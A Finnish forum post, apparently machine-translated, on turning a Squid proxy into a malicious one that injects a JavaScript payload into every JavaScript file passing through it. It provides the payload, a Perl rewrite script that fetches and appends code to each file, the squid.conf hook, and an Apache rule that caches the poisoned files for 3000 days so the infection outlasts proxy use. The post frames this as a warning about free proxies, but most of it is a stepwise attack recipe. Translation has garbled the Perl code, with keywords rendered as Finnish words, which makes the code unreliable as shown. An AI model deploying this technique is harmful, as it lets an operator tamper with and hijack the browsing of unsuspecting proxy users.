Tätä julkaisua on viimeksi muokannut Mo Xiaowen 7.6.2015 klo 23:19
Tämä onnistuu yksinkertaisesti muokkaamalla SQUIDin konfiguraatiota
Mikä on mustekala?
Squid on ohjelmisto, joka välimuistittaa Internet-dataa, vastaanottaa käyttäjien latauspyyntöjä ja käsittelee ladatun datan automaattisesti. Kun käyttäjä haluaa ladata etusivun, hän voi lähettää pyynnön Squidille, pyytää Squidia lataamaan sen puolestaan, sitten Squid yhdistää sivustolle ja pyytää etusivua, ja lähettää etusivun käyttäjälle säilyttäen varmuuskopion. Kun muut käyttäjät hakevat samaa sivua, Squid lähettää tallennetun varmuuskopion välittömästi käyttäjälle, jolloin käyttäjä kokee nopeuden olevan melko nopea. Squid voi välittää protokollia kuten HTTP, FTP, GOPHER, SSL ja WAIS, ja Squid hoitaa sen automaattisesti, ja voit asettaa Squidin tarpeidesi mukaan suodattaaksesi ei-toivotut asiat.
Squid toimii monissa käyttöjärjestelmissä, kuten AIX, Digital, UNIX, FreeBSD, HP-UX, IRIX, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2 jne.
Toteutus on hyvin yksinkertainen:
1. Asenna Squid yhdelle Linux-palvelimelle.
2. Muokkaa palvelimen koodia, lisää osa koodistamme kaikkiin lähetettyihin javascrip-tiedostoihin ja lähetä se eteenpäin.
3. Aseta muokatun js-tiedostomme välimuistiaika mahdollisimman korkeaksi.
Tämä menetelmä koskee myös verkkosivustoja, joissa SSL on käytössä; jos sivusto lataa turvattoman resurssin (kuten jquery HTTP-sivustolle), useimmat selaimet antavat varoituksen, mutta harva kiinnittää huomiota.
Chema kertoi, että yli 5 000 ihmistä käytti hänen välityspalvelintaan muutama päivä julkaisun jälkeen, ja useimmat käyttivät sitä huonoihin tekoihin, koska he käyttivät välityspalvelinta, joten he pitivät sitä anonyyminä ja turvallisena, mutta eivät koskaan odottaneet, että välityspalvelin tekisi myös pahoja asioita.
Tee haitallinen välityspalvelin
Jos sinulla on jo Squid-välityspalvelin, tarvitset myös verkkopalvelimen, kuten Apachen.
Vaihe 1: Luo hyötykuorma
Käytän yksinkertaista skriptiä demonstraationa, jolla ohjaan kaikki hyperlinkit verkkosivustolleni.
/etc/squid/payload.js
[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Vaihe 2: Kirjoita skripti, joka tartuttaa kaikki JS-tiedostot
/etc/squid/poison.pl
[mw_shl_code=perl, totta]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
kun (<>)
{
purra $_;
if($_ =- /(.*.js)/i)
{
$url = 1 $;
system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
system("chmod o+r /var/www/tmp/$pid-$count.js");
system("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
paina "http://127.0.0.1:80/tmp/$pid-$count.js";
}
else
{
Tulosta "$_";
}
$count++;
}[/mw_shl_code]
Tämä skripti käyttää wgetiä saadakseen sivun alkuperäisen javascripin ja poistaakseen t-tiedoston, lisätäkseen koodin /etc/squid/payload.js ja lähettääkseen muokatun tiedoston asiakkaalle, samalla kun sinun täytyy luoda /var/www/tmp-hakemisto ja sallia mustekalain kirjoittaa tiedostoja siihen. Tämä hakemisto tallentaa muokatut js-tiedostot.
Vaihe 3: Yhdistä yllä oleva käsikirjoitus mustekalaan
Lisää se /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Vaihe 4: Tee välimuistin koskaan pettämästä
/var/www/tmp/.htaccess
[mw_shl_code=html,totta] ExpiresActive On
ExpiresDefault "access plus 3000 days"[/mw_shl_code]
Tämä kertoo Apachelle, että hänen täytyy antaa hänelle pitkä viimeinen käyttöaika, kunnes käyttäjä siivoaa välimuistinsa.
Jos yhdistät tämän välityspalvelimen, klikkaamalla mitä tahansa hyperlinkkiä ohjaat sinut verkkosivustolleni, ja välimuisti säilyy, vaikka et käyttäisi välityspalvelinta myöhemmin. Käytin juuri ei-aggressiivista hyötykuormaa, ja tällä menetelmällä hakkerit voivat tehdä paljon enemmän. Muistuta siis itseäsi ja ystäviäsi olemaan varovaisia ilmaisten proxyjen käytössä.
|
Julkaistu 19.1.2015 2.34.56
|
|
|
|
Julkaistu 19.1.2015 8.48.45
|
Vuokraisäntä|
Julkaistu 20.1.2015 14.36.06
|
